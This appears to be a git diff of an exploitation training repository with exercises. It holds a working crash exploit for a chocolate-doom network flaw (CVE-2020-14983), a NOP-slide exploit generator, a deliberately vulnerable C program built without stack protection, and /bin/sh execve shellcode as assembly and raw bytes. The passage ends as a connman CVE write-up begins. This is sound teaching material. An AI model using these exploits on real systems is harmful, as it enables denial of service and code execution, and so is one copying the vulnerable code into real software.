starting + # save the contents of required registers on the stack, since we want to use them for our own purposes + push %rax + push %rdx + push %rdi + push %rsi + # setup the write(int fd, const void*, size_t) system call + mov $1, %rax # system call 1 is write + mov $1, %rdi # parameter 1: file handle 1 is stdout + mov 0x18(%rbp),%rsi # get the pointer to the string to print into %rsi + mov 0x10(%rbp),%rdx # get the string length into %rdx + syscall # invoke operating system to perform the syscall + + # restore original register contents by popping in reverse + pop %rsi + pop %rdi + pop %rdx + pop %rax + pop %rbp + # return to caller (uses return address stored on stack by `callq`) + retq + + # entry point for the "main()" function +_start: + mov $10, %rax # store the loop counter 10 in rax +loop_start: + sub $0x10,%rsp # allocate 16 bytes on stack for passing parameters to print() + movq $message, 0x08(%rsp) # store the pointer to "Hello, world\n" on the stack as first parameter to print() + movq $13, (%rsp) # store the immediate value 13 as size specification for the second parameter to print() + callq print # stores the return address on the stack and jumps to the print() function + add $0x10,%rsp # free 16 bytes to remove parameters to print() from stack + + # loop handling + dec %rax # decrement the loop counter + jnz loop_start # jump-not-zero: perform another loop operation + # if the counter hasn't hit zero yet. + + # the dec instruction stores a flag that + # indicates zero/non-zero result + + # exit(0) + mov $60, %rax # system call 60 is exit + xor %rdi, %rdi # we want return code 0, this is a cheap instruction to generate a 0 in register rdi + syscall # invoke operating system to exit +message: + .ascii "Hello, world\n" # this declares a program constant, ASCII text in this case + +# vim: set ts=8: diff --git a/examples/buffer_doom/README.md b/examples/buffer_doom/README.md new file mode 100644 index 0000000..c4df7ae --- /dev/null +++ b/examples/buffer_doom/README.md @@ -0,0 +1,125 @@ +A Real Stack Overflow Vulnerability in the `chocolate-doom` Doom Port +===================================================================== + +This was a vulnerability handled in [bsc#1173595][1], CVE-2020-14983. + +[1]: https://bugzilla.suse.com/show_bug.cgi?id=1173595 + +`chocolate-doom` is a port of the classical Doom 3D shooter engine to various +platforms. It aims to be as close to the original as possible. + +The vulnerability is in network handling code for multiplayer games. + +In the [upstream repo][2] the issue was fixed in [this commit][3] on the +master branch and in version 3.0.1. Tag 3.0.0 still contains the +vulnerability. + +[2]: https://github.com/chocolate-doom/chocolate-doom.git + +The vulnerability does not allow arbitrary code execution, only +denial-of-service. It is still an interesting case study. + +Building chocolate-doom +----------------------- + +```sh +# install required build dependencies +$ sudo zypper in libSDL2*-devel SDL2_*devel + +# clone and checkout the vulnerable upstream version +$ git clone https://github.com/chocolate-doom/chocolate-doom.git +$ cd chocolate-doom +$ git checkout chocolate-doom-3.0.0 + +# setup an out-of-tree build +$ ./autogen.sh +$ make distclean +$ mkdir ../build +$ cd ../build + +# the -fcommon switch is necessary with newer compilers to avoid a linker error +$ CFLAGS="-fcommon" ../chocolate-doom/configure --prefix=$PWD/../install +$ make +$ make install + +# download a shareware version of the Doom1 data file +$ curl -O https://www.quaddicted.com/files/idgames/idstuff/doom/win95/doom95.zip +$ unzip doom95.zip DOOM1.WAD +$ mkdir -p ~/.local/share/games/doom +$ mv DOOM1.WAD ~/.local/share/games/doom/ + +# after this you can test whether the installation works by running the single +# player version of chocolate-doom. You need to do this is in a graphical +# environment: +$ cd ../install +$ ./bin/chocolate-doom +``` + +Running the Network Server +-------------------------- + +The buffer overflow issue is in the UDP network server code. `chocolate-doom` +does not seem to have a way to configure the listen address / network +interface to restrict its scope. Therefore, so that we don't have to connect +the vulnerable version to a live network, we run the server only in a +split-off network namespace: + +```sh +# split-off a network and user namespace to run chocolate-doom in an isolated +# network environment +$ unshare -n -U -r +# set the new loopback device online +(net-ns) $ ip link set up dev lo + +# enter the installation diretory of chocolate-doom +(net-ns) $ cd install +# run a dedicated server (this does not need a graphical environment) +(net-ns) $ ./bin/chocolate-doom -privateserver -dedicated +``` + +Triggering the Issue +-------------------- + +In a second shell we enter the new network namespace and connect to the server +using the `doom_exploiter.py` script. We simply send random data to trigger a +crash in the server: + +```sh +$ nsenter -n -U --preserve-credentials -t `pidof chocolate-doom` +(net-ns) $ dd if=/dev/urandom of=exploit.bin bs=255 count=1 +[...] +(net-ns) $ ./doom_exploiter.py --exploit exploit.bin localhost +``` + +In the original shell running chocolate-doom you should see: + +``` + Chocolate Doom 3.0.0 +Z_Init: Init zone memory allocation daemon. +zone memory: 0x7f3ccb4ce010, 1000000 allocated for zone +Dedicated server mode. +Segmentation fault (core dumped) +``` + +Analysing the Issue +------------------- + +Look at the [bugfix][3] for the issue. The vulnerable code is in +`NET_ReadSettings()`. The call to this function in the server context is +performed in `net_server.c:921`. There you can also see where the vulnerable +`net_gamesettings_t settings` buffer is placed onto the stack. Examine this +data type and its use in in the for loop in `net_structrw.c:119` to understand +the overflow scenario. + +[3]: https://github.com/chocolate-doom/chocolate-doom/commit/f1a8d991aa8a14afcb605cf2f65cd15fda204c56 + +Why can this overflow not be used to achieve arbitrary code execution? Look at +the memory layout to see what happens during overflow. Also consider other +problems this overflow could have for full code execution. + +Solution +-------- + +The limitation lies in the particular use of `NET_ReadInt8()` on `(unsigned int*) +&settings->player_classes[i]`. What happens when overflowing the 255 available +bytes? diff --git a/examples/buffer_doom/doom_exploiter.py b/examples/buffer_doom/doom_exploiter.py new file mode 100755 index 0000000..2586b47 --- /dev/null +++ b/examples/buffer_doom/doom_exploiter.py @@ -0,0 +1,344 @@ +#!/usr/bin/python3 +# vim: ts=4 et sw=4 sts=4 : + +from enum import IntEnum +import argparse +import socket +import struct +import sys + +# Matthias Gerstner +# SUSE Linux GmbH +# matthias.gerstner@suse.com + +DEFPORT = 2342 + +PacketType = IntEnum("PacketType", [ + "SYN", + "ACK", + "REJECTED", + "KEEPALIVE", + "WAITING_DATA", + "GAMESTART", + "GAMEDATA", + "GAMEDATA_ACK", + "DISCONNECT", + "DISCONNECT_ACK", + "RELIABLE_ACK", + "GAMEDATA_RESEND", + "CONSOLE_MESSAGE", + "QUERY", + "QUERY_RESPONSE", + "LAUNCH", + "NAT_HOLE_PUNCH", + ], start=0 +) + +MAGIC_NUMBER = 1454104972 +RELIABLE_PACKET_FLAG = 1 << 15 +CLIENT_ID = "Chocolate Doom 3.0.0" + +GameMode = IntEnum("GameMode", [ + "shareware", + "registered", + "commercial", + "retail", + "indetermined" + ], start=0 +) + +GameMission = IntEnum("GameMission", [ + "doom", + "doom2", + "pack_tnt", + "pack_plut", + "pack_chex", + "pack_hacx", + "heretic", + "hexen", + "strife", + "none" + ], start=0 +) + +PlayerClass = IntEnum("PlayerClass", [ + "FIGHTER", + "CLERIC", + "MAGE", + "PIG" + ], start=0 +) + +ProtocolStage = IntEnum("ProtocolStage", [ + "INIT", + "SYN", + "LAUNCH", + "SETTINGS", + "DONE" + ] +) + + +# modelling of the net_connect_data_t from src/net_defs.h +class ConnectData: + def __init__(self): + self.gamemode = GameMode.shareware + self.gamemission = GameMission.doom + self.lowres_turn = 0 + self.drone = 0 + self.max_players = 4 + self.is_freedoom = 0 + self.wad_sha1sum = bytes(20) + self.deh_sha1sum = bytes(20) + self.player_class = PlayerClass.FIGHTER + + +class OutMessage: + + def __init__(self, ptype): + self.clear() + self.addInt16(ptype) + + def clear(self): + self.m_msg = bytes() + + @classmethod + def getUint32(cls, num): + return struct.pack(">I", num) + + def addUint32(self, num): + self.m_msg += self.getUint32(num) + + def prependUint32(self, num): + self.m_msg = self.getUint32(num) + self.m_msg + + def addInt32(self, num): + self.m_msg += struct.pack(">i", num) + + def addUint16(self, num): + self.m_msg += struct.pack(">H", num) + + def addInt16(self, num): + self.m_msg += struct.pack(">h", num) + + def addUint8(self, num): + self.m_msg += bytes([num]) + + def addInt8(self, num): + self.m_msg += bytes([num]) + + def addString(self, s): + self.m_msg += s.encode() + # null terminator + self.addUint8(0) + + def addRaw(self, bts): + self.m_msg += bts + + def addConnectData(self, data): + self.addInt8(data.gamemode) + self.addInt8(data.gamemission) + self.addInt8(data.lowres_turn) + self.addInt8(data.drone) + self.addInt8(data.max_players) + self.addInt8(data.is_freedoom) + self.m_msg += data.wad_sha1sum + self.m_msg += data.deh_sha1sum + self.addInt8(data.player_class) + + def sendMessage(self, sock): + sock.send(self.m_msg) + + +class InMessage: + + def __init__(self, msg): + self.reset() + self.m_msg = msg + + def reset(self): + self.m_msg = bytes() + self.m_pos = 0 + + def parseUint32(self): + data = self.getNextBytes(4) + return struct.unpack(">I", data)[0] + + def parseInt16(self): + data = self.getNextBytes(2) + return struct.unpack(">h", data)[0] + + def parseUint16(self): + data = self.getNextBytes(2) + return struct.unpack(">H", data)[0] + + def parseUint8(self): + data = self.getNextBytes(1) + return data[0] + + def parseString(self): + ret = "" + while True: + char = self.m_msg[self.m_pos] + self.m_pos += 1 + if char == 0: + break + ret += chr(char) + + return ret + + def length(self): + return len(self.m_msg) + + def getNextBytes(self, num): + assert len(self.m_msg) - self.m_pos >= num + data = self.m_msg[self.m_pos:self.m_pos + num] + self.m_pos += num + return data + + +class DoomExploiter: + + def __init__(self): + self.parser = argparse.ArgumentParser() + self.parser.add_argument("serveraddr", help="server hostname or IP address", type=str) + self.parser.add_argument("--exploit", type=str, + help="exploit data to use as stack overflow package. either a file path or '-' to read from stdin.") + self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self.stage = ProtocolStage.INIT + + def readExploit(self): + if self.args.exploit == "-": + # read from stdin + self.args.exploit = sys.stdin.read() + else: + with open(self.args.exploit, 'rb') as fd: + self.args.exploit = fd.read() + + MAXLEN = (1 << 8) - 1 + + if len(self.args.exploit) > MAXLEN: + print(f"Exploit is too large ({len(self.args.exploit)}), maximum length is {MAXLEN} bytes.", + file=sys.stderr) + sys.exit(1) + + def setStage(self, stage): + print(f"State change {self.stage.name} -> {stage.name}") + self.stage = stage + + def sendSyn(self): + msg = OutMessage(PacketType.SYN) + msg.addInt32(MAGIC_NUMBER) + msg.addString(CLIENT_ID) + # write protocol list + msg.addInt8(1) # number of prots + msg.addString("CHOCOLATE_DOOM_0") + connect_data = ConnectData() + msg.addConnectData(connect_data) + msg.addString("hellish player") + msg.sendMessage(self.s) + + def sendLaunch(self): + msg = OutMessage(PacketType.LAUNCH) + # no further parameters as it seems + msg.sendMessage(self.s) + + def sendSettings(self): + + num_players = len(self.args.exploit) + + msg = OutMessage(PacketType.GAMESTART) + msg.addUint8(0) # ticdup + msg.addUint8(0) # extratics + msg.addUint8(0) # deathmatch + msg.addUint8(0) # no monsters + msg.addUint8(0) # fast monsters + msg.addUint8(0) # respawn monsters + msg.addUint8(0) # episode + msg.addUint8(0) # map (nr.?) + msg.addUint8(0) # skill + msg.addUint8(0) # game version + msg.addUint8(0) # lowres turn + msg.addUint8(0) # new sync + msg.addUint32(15000) # time limit + msg.addUint8(0) # load game + msg.addUint8(0) # random + # THIS IS THE OVERFLOW ITEM # + msg.addUint8(num_players) # num players + msg.addUint8(0) # consoleplayer + msg.addRaw(self.args.exploit) + msg.sendMessage(self.s) + + def handleReliable(self, rawtype, msg): + # this protocol supports some kind of ACK protocol where each sequence + # number has to be ACKed, otherwise the server resends it all the time + + seq_nr = msg.parseUint8() + + ack = OutMessage(PacketType.RELIABLE_ACK) + ack.addUint8(seq_nr & 0xff) + ack.sendMessage(self.s) + + return rawtype & ~RELIABLE_PACKET_FLAG + + def processMsg(self, msg): + #print("Received msg:", msg) + msg = InMessage(msg) + rawtype = msg.parseUint16() + + if rawtype & RELIABLE_PACKET_FLAG: + rawtype = self.handleReliable(rawtype, msg) + + ptype = PacketType(rawtype) + + if ptype == PacketType.KEEPALIVE: + #print("Keepalive message, ignoring") + pass + elif ptype == PacketType.SYN: + if self.stage == ProtocolStage.SYN: + package = msg.parseString() + protocol = msg.parseString() + print(f"Connected to {package} with protocol {protocol}") + self.setStage(ProtocolStage.LAUNCH) + else: + # is send again and again for some reason + pass + elif ptype == PacketType.WAITING_DATA: + # ignore this, it is coming at a regular interval to inform about + # the game start pending + pass + else: + print("received", ptype) + + def checkSendMsg(self): + if self.stage == ProtocolStage.INIT: + self.sendSyn() + self.setStage(ProtocolStage.SYN) + elif self.stage == ProtocolStage.LAUNCH: + # only the "controlling" client can launch, but it should work + # when we are the only client + self.sendLaunch() + self.setStage(ProtocolStage.SETTINGS) + elif self.stage == ProtocolStage.SETTINGS: + self.sendSettings() + self.setStage(ProtocolStage.DONE) + + def run(self): + self.args = self.parser.parse_args() + if self.args.exploit: + self.readExploit() + else: + # by default don't overflow the stack, use the actual maximum players + # and a well defined sequence + self.args.exploit = bytes([0, 1, 2, 3, 4, 5, 6, 7, 8]) + self.s.connect((self.args.serveraddr, DEFPORT)) + + while True: + self.checkSendMsg() + msg = self.s.recv(1024) + self.processMsg(msg) + + +if __name__ == '__main__': + exploiter = DoomExploiter() + exploiter.run() diff --git a/examples/buffer_doom/gen_exploit.py b/examples/buffer_doom/gen_exploit.py new file mode 120000 index 0000000..1d3e2fd --- /dev/null +++ b/examples/buffer_doom/gen_exploit.py @@ -0,0 +1 @@ +../code_injection/gen_exploit.py \ No newline at end of file diff --git a/examples/code_injection/.gitignore b/examples/code_injection/.gitignore new file mode 100644 index 0000000..a731948 --- /dev/null +++ b/examples/code_injection/.gitignore @@ -0,0 +1 @@ +kitty2 diff --git a/examples/code_injection/Makefile b/examples/code_injection/Makefile new file mode 100644 index 0000000..607001f --- /dev/null +++ b/examples/code_injection/Makefile @@ -0,0 +1,16 @@ +MAIN = kitty2 +SOURCES = $(wildcard *.c) +OBJECTS = $(SOURCES:.c=.o) +FLAGS = -fno-omit-frame-pointer -fno-stack-protector -g -O0 -Wall -Wno-deprecated-declarations -Werror + +$(MAIN): $(OBJECTS) + gcc $(FLAGS) $(OBJECTS) -o $(MAIN) + execstack -s $(MAIN) || rm $(MAIN) + +%.o: %.c + gcc $(FLAGS) -c $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) + +include ../common/Makefile diff --git a/examples/code_injection/README.md b/examples/code_injection/README.md new file mode 100644 index 0000000..6216b1b --- /dev/null +++ b/examples/code_injection/README.md @@ -0,0 +1,52 @@ +Setting Arbitrary Code Execution into Motion +============================================ + +With the things we've learned from the previous examples we can now make the +final attempt to execute arbitrary code by exploiting a stack buffer overflow. + +Once more we have a vulnerable program in `kitty2.c`. We need the piece of +self contained machine code that executes '/bin/sh' from the previous example +`exec_snippet`. Put this binary code into a separate file. + +The accompanying python program `gen_exploit.py` can help you to create the +exploit data we need according to the principles we've learned. It will +prepend NOP instructions, embed the provided machine code and append a number +of return addresses. Inspect the hexdump of one of these exploit sequences to +understand the structure better. An example invocation looks like this: + +``` +$ ./gen_exploit.py -a 0x7fffa2da0000 -c ./execve.bin -s 256 --output >exploit.bin +$ xxd exploit.bin +``` + +The still somewhat difficult part now is to find a suitable return address +that will hit our NOP instructions. Otherwise the program will just crash with +SIGILL or SIGSEGV. First you need a shell without 'address space +randomization' which is a security feature to make these kind of overflows +more difficult. You can call `make shell` to get a subshell that is configured +to disable this feature. + +Then you can try to find out the stack address of the overflowing buffer +either by passing a well defined pattern (see the `zombie_call` example) or +inspecting the addresses in `gdb` or simply printing it from the program +itself. Since we have the NOP slide the buffer address doesn't need to be hit +perfectly. Then you parametrize the python script to create a suitable exploit +buffer. + +Save the exploit data in a file and pass the file to the vulnerable program +(not via stdin but as a parameter). On success a new shell should be started +as a result of the code execution. + +NOTE: The reason why feeding the exploit on `stdin` seemingly doesn't work is +that stdin will be in the EOF state and the exploit *will* work but the shell +that is started will detected the closed `stdin` stream and exit immediately. + +Exercises +========= + +- Experiment with different return addresses and see that if you hit any of + the NOP instructions the exploit will still trigger. +- Dissect the exploit data to understand its structure. +- Manipulate the injected machine code for `execve()` to call a different + binary or perform a completely different system call (like creating a new + file). diff --git a/examples/code_injection/gen_exploit.py b/examples/code_injection/gen_exploit.py new file mode 100755 index 0000000..aa19627 --- /dev/null +++ b/examples/code_injection/gen_exploit.py @@ -0,0 +1,163 @@ +#!/usr/bin/python3 + +import argparse +import os +import subprocess +import sys +import tempfile + +# Matthias Gerstner +# SUSE Linux GmbH +# matthias.gerstner@suse.com + + +def hex_int(val): + return int(val, 16) + + +def getSignalName(sig): + import signal + return signal.Signals(sig).name + + +def eprint(*args, **kwargs): + kwargs['file'] = sys.stderr + print(*args, **kwargs) + + +parser = argparse.ArgumentParser( + description="Creates exploit data for a stack overflow to execute an arbitrary code snippet." +) + +parser.add_argument( + "-p", "--program", help="The program to exploit. This needs to accept a file input parameter that will lead to an overflow.", + required=False +) + +parser.add_argument( + "-a", "--address", help="Return address to use for the exploit.", + type=hex_int, + required=True +) + +parser.add_argument( + "-c", "--code", help="Path to a file containing the isolated, binary code snippet to embed into the exploit for execution.", + type=str, + required=True +) + +parser.add_argument( + "-s", "--size", help="Size of the buffer you're overflowing.", + type=int, + required=True +) + +parser.add_argument( + "-e", "--exploit-size", help="Size of the complete exploit buffer. Needs to be somewhat larger than the buffer --size we're overflowing.", + type=int, + default=0 +) + +parser.add_argument( + "--padding-offset", help="custom offset for padding of code and return address", + type=int, + default=0 +) + +parser.add_argument( + "-o", "--output", help="Just output the exploit data instead of feeding it to the exploitable program.", + default=False, + action='store_true' +) + +args = parser.parse_args() + +prog = args.program + +if prog and not os.path.isabs(prog): + prog = os.path.join(os.getcwd(), prog) + +if not args.output and (not prog or not os.path.exists(prog)): + eprint("Specify either -o or a valid -p") + if prog: + eprint("Couldn't find program to exploit in", prog) + sys.exit(1) + +try: + with open(args.code, 'rb') as code_fd: + code = code_fd.read() + +except IOError as e: + eprint("Failed to open code input file:", e) + sys.exit(1) + +MIN_EXTRA_SPACE = 64 +DEFAULT_OF_SIZE = 128 + +if args.size < len(code): + eprint("Target stack buffer is too small to fit the exploit code") + eprint("Need at least", len(code), "bytes") + sys.exit(1) +elif args.exploit_size and args.exploit_size < args.size + 8: + eprint("Requested exploit size is too small to overwrite the stack return address") + eprint("Need at least", args.size + 8, "or better", args.size + 64) + sys.exit(1) +elif not args.exploit_size: + args.exploit_size = args.size + DEFAULT_OF_SIZE + +# time to create the exploit buffer + +NOP_INSTRUCTION = int(0x90).to_bytes(1, byteorder='little', signed=False) + +# start the buffer with as much NOPs as we can afford +nop_amount = args.size - len(code) +# make sure the code starts on a word boundary to avoid alignment issues in +# the code that follows +nop_amount = nop_amount - (nop_amount % 8) +nop_amount += args.padding_offset +exploit = NOP_INSTRUCTION * nop_amount + +# add the exploit code +exploit += code + +# number of return addresses we're adding to the end of the buffer, this is +# what will actually overflow onto the stack mgm area in hope we're reaching +# the return address +ret_addr_count = int((args.exploit_size - len(exploit)) / 8) +# make sure the return address starts at an 8-byte alignment +padding_count = 8 - (len(exploit) % 8) +padding_count = padding_count if padding_count != 8 else 0 +padding_count += args.padding_offset +exploit += NOP_INSTRUCTION * padding_count +ret_addr_bin = args.address.to_bytes(8, byteorder='little', signed=False) + +exploit += (ret_addr_count * ret_addr_bin) + +if args.output: + + if os.isatty(sys.stdout.fileno()): + + for bt in exploit: + print("\\x" + format(bt, '02x'), end='') + + print() + else: + # write binary data if this is a file output + os.write(sys.stdout.fileno(), exploit) + + sys.exit(0) + +exploit_file = tempfile.NamedTemporaryFile() +exploit_file.write(exploit) +exploit_file.flush() + +# pass the exploit by file instead of via stdin, because if the exploit +# triggers (i.e. calling /bin/sh) then the shell would be immediately closed +# if stdin returns EOF. +process = subprocess.Popen([prog, exploit_file.name]) + +res = process.wait() +if res >= 0: + print("Program exited with", res) +else: + print("Program terminated with signal", getSignalName(abs(res))) diff --git a/examples/code_injection/kitty2.c b/examples/code_injection/kitty2.c new file mode 100644 index 0000000..762bdcf --- /dev/null +++ b/examples/code_injection/kitty2.c @@ -0,0 +1,49 @@ +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * One more badly implemented cat like program. + * + * It accepts input either from stdin or a file passed as parameter argv[1]. + */ + +void cat(FILE *input) { + char text[256]; + int res; + + printf("[address of text buffer: %p]\n", text); + + while (1) { + // read a complete line into the text buffer + res = fscanf(input, " %[^\n]", text); + + if (res == EOF) { + return; + } else if (res != 1) { + fprintf(stderr, "bad input\n"); + return; + } + + printf("%s\n", text); + } +} + +int main(const int argc, const char **argv) { + // open file specified on command line or stdin by default + FILE *input = (argc == 2) ? fopen(argv[1], "r") : stdin; + + if (input == NULL) { + fprintf(stderr, "bad input file\n"); + return 1; + } + + cat(input); + + return 0; +} diff --git a/examples/common/Makefile b/examples/common/Makefile new file mode 100644 index 0000000..db98d62 --- /dev/null +++ b/examples/common/Makefile @@ -0,0 +1,15 @@ +# it's pretty hard to get an extended shell prompt: +# - PS1 is always overwritten by .bashrc +# - PROMPT_COMMAND is a way around that - or passing --norc and --noprofile +# - But first we need to know the original PS1 value, which can be obtained +# via /bin/bash -i -c '...' +# - Make doesn't make this easier ... for some reason the escaping doesn't +# work the usual way here +shell: PS=$(shell /bin/bash -c -i 'echo $$PS1') +shell: + @ PS1="${PS} (exploit) " setarch `uname -m` -R /bin/bash --noprofile --norc + +zsh: PS=$(shell $$SHELL -c -i 'env | grep PS1 | cut -d = -f2-') +zsh: + @ PS1="${PS} (exploit) " setarch `uname -m` -R $$SHELL -f + diff --git a/examples/complex_exec_snippet/.gitignore b/examples/complex_exec_snippet/.gitignore new file mode 100644 index 0000000..4e72e44 --- /dev/null +++ b/examples/complex_exec_snippet/.gitignore @@ -0,0 +1 @@ +exec_asm_mprotect diff --git a/examples/complex_exec_snippet/Makefile b/examples/complex_exec_snippet/Makefile new file mode 100644 index 0000000..d8e3b42 --- /dev/null +++ b/examples/complex_exec_snippet/Makefile @@ -0,0 +1,14 @@ +BINS=exec_asm exec_bin +EXTRA_BINS=exec_asm_mprotect +all: $(BINS) + +exec_asm: exec_asm.c + gcc -g $< -o $@ + execstack -s $@ || rm $@ + +exec_bin: exec_bin.c + gcc -g $< -o $@ + execstack -s $@ || rm $@ + +clean: + rm -f *.o $(BINS) $(EXTRA_BINS) diff --git a/examples/complex_exec_snippet/README.md b/examples/complex_exec_snippet/README.md new file mode 100644 index 0000000..c9409fc --- /dev/null +++ b/examples/complex_exec_snippet/README.md @@ -0,0 +1,5 @@ +# /bin/sh with extra parameters + +This is a more complex variant of `exec_snippet` which calls /bin/sh with +extra parameters. + diff --git a/examples/complex_exec_snippet/exec_asm.c b/examples/complex_exec_snippet/exec_asm.c new file mode 100644 index 0000000..bb72ed6 --- /dev/null +++ b/examples/complex_exec_snippet/exec_asm.c @@ -0,0 +1,122 @@ +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + * + * This program sets up an execve() system call to run /bin/sh with empty + * environment and a call to "echo \"you've been hacked\"". This is done using + * inline assembly and the x86_64 syscall instruction. + * + * A more complex variant of exec_snippet + */ + +/* + * This program modifies the .text segment (i.e. the code modifies itself) + * which is not allowed by default. + * + * This happens only for demonstration purposes to test the assembler code so + * bypassing this restriction is not really relevant for the security exploit + * in practice. + * + * To get this code to work for testing we can modify the page protection + * during runtime with mprotect() or link with writable text segments. + * + * The ld option -N recently started producing a linker error with + * __ehdr_start being undefined. It seems to have to do with the GOT/PLT + * table being generated and requiring dynamic linking. Therefore we use the + * mprotect approach now. + */ +#define USE_MPROTECT + +#ifdef USE_MPROTECT + +# include +# include + +static void makeTextWritable(void *mainptr) { + // mark main() code writable during runtime, alternative to linking + // with -Wl-N and statically + intptr_t addr = (intptr_t)mainptr; + // round down to the page size boundary + addr = addr & (~(intptr_t)(4096-1)); + // allow all operations on the code + mprotect((void*)addr, 4096, PROT_READ | PROT_WRITE | PROT_EXEC); +} + +#endif // USE_MPROTECT + +int main() { +#ifdef USE_MPROTECT + makeTextWritable(&main); +#endif + + /* + * the execve(2) system call takes the following parameters: + * + * rax: the system call number 0x3b + * rdi: a pointer to the string representing the path to the + * program to execute + * rsi: a pointer to the argument list (char **) terminated with a + * NULL pointer + * rdx: a pointer to the environment list (char **) terminated with a + * NULL pointer + */ + + __asm__( + // jump to the call instruction, which will get the stack + // address to use for our exec() parameter addressing. + // + // the offset to jump to needs to be calculated from the + // length of the assembler instructions or by disassembling + "jmp . + 0x4b\n" // 2 bytes + // retrieve the return address from the stack into %rbx + "popq %rbx\n" // 1 byte + // write the address of the /bin/sh string just after the + // last parameter to serve as argv[] list to execve() + "movq %rbx,0x37(%rbx)\n" // 4 bytes + // same for the other addresses + "leaq 0x9(%rbx),%rcx\n" // 4 bytes + "movq %rcx,0x3f(%rbx)\n" // 4 bytes + "leaq 0xc(%rbx),%rcx\n" // 4 bytes + "movq %rcx,0x47(%rbx)\n" // 4 bytes + // make sure the /bin/sh string is null terminated (could have + // been skipped in case of strcpy() based overflow or other \0 + // based string copy functions) + "movb $0x0,0x7(%rbx)\n" // 4 bytes = 0x1b bytes + // same for the other two parameters + "movb $0x0,0x0b(%rbx)\n" // 4 bytes + "movb $0x0,0x25(%rbx)\n" // 4 bytes + // provide a null pointer terminator for the argv[] and envp[] + // list to execve() + "movq $0x0,0x4f(%rbx)\n" // 8 bytes + // setup the execve() parameters + // + // system call number + "movq $0x3b,%rax\n" // 7 bytes = 0x32 bytes + // the address of the /bin/sh string to execute + "movq %rbx,%rdi\n" // 3 bytes + // the address of the address of the /bin/sh string and a + // following NULL terminator to serve as a parameter list + "leaq 0x37(%rbx),%rsi\n" // 4 bytes + // terminating NULL pointer for the environment list + "leaq 0x4f(%rbx),%rdx\n" // 4 bytes + // execute the system call + "syscall\n" // 2 bytes = 0x3f bytes + // fallback code if execve() should fail: exit with 0 + // thus we keep a low profile, user/administrator might wonder + // why the program exited but there will be no visible crash + "movq %rax, %rbx\n" // 4 bytes + "movq $0x1, %rax\n" // 7 bytes + "int $0x80\n" // 2 bytes = 0x4f bytes + // jump back to the pop code, this will put the return address + // (the address to the exec string parameter!) onto the stack + "call . - 0x49\n" // 5 bytes + // added a dummy X character to change the offsets a bit, + // otherwise we'd have an 0xa offset which is '\n' and a + // terminator for some line based functions + ".string \"/bin/shX\"\n" // 8 bytes = 0x5c bytes + ".string \"-c\"\n" // 4 bytes + ".string \"echo \\\"you've been hacked\\\"\"\n" // 26 bytes = 0x7a bytes + ); +} + diff --git a/examples/complex_exec_snippet/exec_bin.c b/examples/complex_exec_snippet/exec_bin.c new file mode 100644 index 0000000..3507e2e --- /dev/null +++ b/examples/complex_exec_snippet/exec_bin.c @@ -0,0 +1,66 @@ +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This function finds the location of the return address (i.e. void**) on the + * stack. `start` needs to be the a 8-byte aligned start address on the stack + * to start with and `cur_ret` needs to be the current return address. + * + * There is no really realiable way to get this address otherwise, since + * there's usually no need to achieve this programmatically. + */ +void** get_return_address_ptr(void **start, void *cur_ret) { + int i; + + // We need to reach the return address, it is found some locations + // after the location of the local stack parameter. this logic will + // fail if `start` is not on a 8-byte boundary. For safety reasons + // don't continue until we reach the end of the stack but just look + // into the first few qwords until we give up. + for (i = 0; i < 32; i++) { + start++; + + if (*start == cur_ret) + return start; + } + + return NULL; +} + +void main() { + // This builtin gcc function allows to retrieve the current return address value + void *ret = __builtin_return_address(0); + void **retp = get_return_address_ptr(&ret, ret); + + /* + * this is binary x86_64 code extracted from the exec_asm.c binary that + * performs an exec system call for "/bin/sh -c \"you've been hacked\"" and + * then, should the exec() fail for some reason, calls exit(0); + */ + char execve_code[] = { + 0xeb, 0x49, 0x5b, 0x48, 0x89, 0x5b, 0x37, 0x48, 0x8d, 0x4b, 0x09, 0x48, + 0x89, 0x4b, 0x3f, 0x48, 0x8d, 0x4b, 0x0c, 0x48, 0x89, 0x4b, 0x47, 0xc6, + 0x43, 0x07, 0x00, 0xc6, 0x43, 0x0b, 0x00, 0xc6, 0x43, 0x25, 0x00, 0x48, + 0xc7, 0x43, 0x4f, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x3b, 0x00, + 0x00, 0x00, 0x48, 0x89, 0xdf, 0x48, 0x8d, 0x73, 0x37, 0x48, 0x8d, 0x53, + 0x4f, 0x0f, 0x05, 0x48, 0x89, 0xc3, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, + 0x00, 0xcd, 0x80, 0xe8, 0xb2, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, + 0x2f, 0x73, 0x68, 0x58, 0x00, 0x2d, 0x63, 0x00, 0x65, 0x63, 0x68, 0x6f, + 0x20, 0x22, 0x79, 0x6f, 0x75, 0x27, 0x76, 0x65, 0x20, 0x62, 0x65, 0x65, + 0x6e, 0x20, 0x68, 0x61, 0x63, 0x6b, 0x65, 0x64, 0x22, 0x00 + }; + + if (!retp) { + fprintf(stderr, "Failed to determine return address location!\n"); + return; + } + + // overwrite the return address to be our injected binary code + (*retp) = (void*)execve_code; +} + diff --git a/examples/connman_dns/Makefile b/examples/connman_dns/Makefile new file mode 100644 index 0000000..d0b54b8 --- /dev/null +++ b/examples/connman_dns/Makefile @@ -0,0 +1,16 @@ +PRELOAD = geteuid-preload/libgeteuid_preload.so +SOURCES = $(wildcard geteuid-preload/*.c) +OBJECTS = $(SOURCES:.c=.o) +FLAGS = -shared + +$(PRELOAD): $(OBJECTS) + gcc $(FLAGS) $(OBJECTS) -o $(PRELOAD) + +%.o: %.c + gcc -c $(FLAGS) $< -o $@ -DREAL_USER_ID=$(shell id -u) + +clean: + rm -f $(PRELOAD) $(OBJECTS) + +shell: + setarch `uname -m` -R /bin/bash diff --git a/examples/connman_dns/README.md b/examples/connman_dns/README.md new file mode 100644 index 0000000..d551094 --- /dev/null +++ b/examples/connman_dns/README.md @@ -0,0 +1,307 @@ +A Real Stack Overflow Vulnerability in the connman network manager +================================================================== + +This was a vulnerability handled in [bnc#1186869][1], CVE-2021-33833. + +[1]: https://bugzilla.suse.com/show_bug.cgi?id=1186869 + +Connman is a network manager service similar to NetworkManager but with a +newer codebase supported by Intel. The 